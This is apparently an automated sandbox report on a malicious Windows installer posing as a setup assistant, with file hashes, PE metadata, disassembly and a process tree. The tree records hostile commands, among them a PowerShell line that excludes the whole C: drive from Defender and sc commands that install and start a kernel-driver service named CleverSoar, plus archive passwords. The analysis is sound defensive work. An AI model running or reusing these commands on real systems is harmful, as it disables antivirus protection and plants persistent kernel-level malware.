                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6144
                                                        Entropy (8bit):4.720366600008286
                                                        Encrypted:false
                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):406
                                                        Entropy (8bit):5.117520345541057
                                                        Encrypted:false
                                                        SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                                        MD5:9200058492BCA8F9D88B4877F842C148
                                                        SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                                        SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                                        SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                                        Malicious:false
                                                        Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.921128632410474
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                                        • Inno Setup installer (109748/4) 1.08%
                                                        • InstallShield setup (43055/19) 0.42%
                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                        File name:#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                                        File size:5'707'417 bytes
                                                        MD5:a32b45411fdacb8dc364e2ecc75f7c54
                                                        SHA1:a1d3298f2e0ec913d269c8e393ddf49f6cd8fdbc
                                                        SHA256:1f20c061d4c41e3e775e80d6aabf5f23d88fbf25923f5821e81b824ef1d1ee46
                                                        SHA512:9f353857e6e8871c236c1f04f9f2285aa50a9b697da2c2adcd7a9f1bf6fcd7dcaffdcb111333432366eb709b10ee7108cfaf354c89d203a53d768268e393f195
                                                        SSDEEP:98304:XwREri0dWV2OQavkTsvav3PlP4mJ3EANJhSzkYDKjgJdMwZgf:lvdEzQavkTsvafPlAmJ31DSIYCIs
                                                        TLSH:1A461213F2CBE43EE0590B3B05B3A15494FB6A11A523AE5696ECB4ECCF311601E3E657
                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                        Icon Hash:0c0c2d33ceec80aa
                                                        Entrypoint:0x4a83bc
                                                        Entrypoint Section:.itext
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:6
                                                        OS Version Minor:1
                                                        File Version Major:6
                                                        File Version Minor:1
                                                        Subsystem Version Major:6
                                                        Subsystem Version Minor:1
                                                        Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add esp, FFFFFFA4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor eax, eax
                                                        mov dword ptr [ebp-3Ch], eax
                                                        mov dword ptr [ebp-40h], eax
                                                        mov dword ptr [ebp-5Ch], eax
                                                        mov dword ptr [ebp-30h], eax
                                                        mov dword ptr [ebp-38h], eax
                                                        mov dword ptr [ebp-34h], eax
                                                        mov dword ptr [ebp-2Ch], eax
                                                        mov dword ptr [ebp-28h], eax
                                                        mov dword ptr [ebp-14h], eax
                                                        mov eax, 004A2EBCh
                                                        call 00007F04686F9A35h
                                                        xor eax, eax
                                                        push ebp
                                                        push 004A8AC1h
                                                        push dword ptr fs:[eax]
                                                        mov dword ptr fs:[eax], esp
                                                        xor edx, edx
                                                        push ebp
                                                        push 004A8A7Bh
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        mov eax, dword ptr [004B0634h]
                                                        call 00007F046878B3BBh
                                                        call 00007F046878AF0Eh
                                                        lea edx, dword ptr [ebp-14h]
                                                        xor eax, eax
                                                        call 00007F0468785BE8h
                                                        mov edx, dword ptr [ebp-14h]
                                                        mov eax, 004B41F4h
                                                        call 00007F04686F3AE3h
                                                        push 00000002h
                                                        push 00000000h
                                                        push 00000001h
                                                        mov ecx, dword ptr [004B41F4h]
                                                        mov dl, 01h
                                                        mov eax, dword ptr [0049CD14h]
                                                        call 00007F0468786F13h
                                                        mov dword ptr [004B41F8h], eax
                                                        xor edx, edx
                                                        push ebp
                                                        push 004A8A27h
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        call 00007F046878B443h
                                                        mov dword ptr [004B4200h], eax
                                                        mov eax, dword ptr [004B4200h]
                                                        cmp dword ptr [eax+0Ch], 01h
                                                        jne 00007F046879212Ah
                                                        mov eax, dword ptr [004B4200h]
                                                        mov edx, 00000028h
                                                        call 00007F0468787808h
                                                        mov edx, dword ptr [004B4200h]
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xcb0000x110000x110005c24f1fdca2aa99f72cdacc12e9a194fFalse0.18787339154411764data3.721333192760738IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                                        RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                                        RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                                        RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                                        RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                                        RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                                        RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                                        RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                                        RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                                        RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                                        RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                                        RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                                        RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                                        RT_STRING0xd8e000x3f8data0.3198818897637795
                                                        RT_STRING0xd91f80x2dcdata0.36475409836065575
                                                        RT_STRING0xd94d40x430data0.40578358208955223
                                                        RT_STRING0xd99040x44cdata0.38636363636363635
                                                        RT_STRING0xd9d500x2d4data0.39226519337016574
                                                        RT_STRING0xda0240xb8data0.6467391304347826
                                                        RT_STRING0xda0dc0x9cdata0.6410256410256411
                                                        RT_STRING0xda1780x374data0.4230769230769231
                                                        RT_STRING0xda4ec0x398data0.3358695652173913
                                                        RT_STRING0xda8840x368data0.3795871559633027
                                                        RT_STRING0xdabec0x2a4data0.4275147928994083
                                                        RT_RCDATA0xdae900x10data1.5
                                                        RT_RCDATA0xdaea00x310data0.6173469387755102
                                                        RT_RCDATA0xdb1b00x2cdata1.1590909090909092
                                                        RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                                        RT_VERSION0xdb2980x584dataEnglishUnited States0.2804532577903683
                                                        RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                        DLLImport
                                                        kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                        comctl32.dllInitCommonControls
                                                        user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                        oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                        advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                                        NameOrdinalAddress
                                                        __dbk_fcall_wrapper20x40fc10
                                                        dbkFCallWrapperAddr10x4b063c
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        No network behavior found

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:01:50:41
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
                                                        Imagebase:0x890000
                                                        File size:5'707'417 bytes
                                                        MD5 hash:A32B45411FDACB8DC364E2ECC75F7C54
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:01:50:42
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
                                                        Imagebase:0xe00000
                                                        File size:3'366'912 bytes
                                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:01:50:42
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:01:50:42
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:01:50:46
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff693ab0000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:5
                                                        Start time:01:50:51
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
                                                        Imagebase:0x890000
                                                        File size:5'707'417 bytes
                                                        MD5 hash:A32B45411FDACB8DC364E2ECC75F7C54
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:01:50:51
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$402A0,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
                                                        Imagebase:0xb40000
                                                        File size:3'366'912 bytes
                                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:01:50:53
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:01:50:53
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                                        Imagebase:0xad0000
                                                        File size:831'200 bytes
                                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 0%, ReversingLabs
                                                        • Detection: 0%, Virustotal, Browse
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                                        Imagebase:0xad0000
                                                        File size:831'200 bytes
                                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

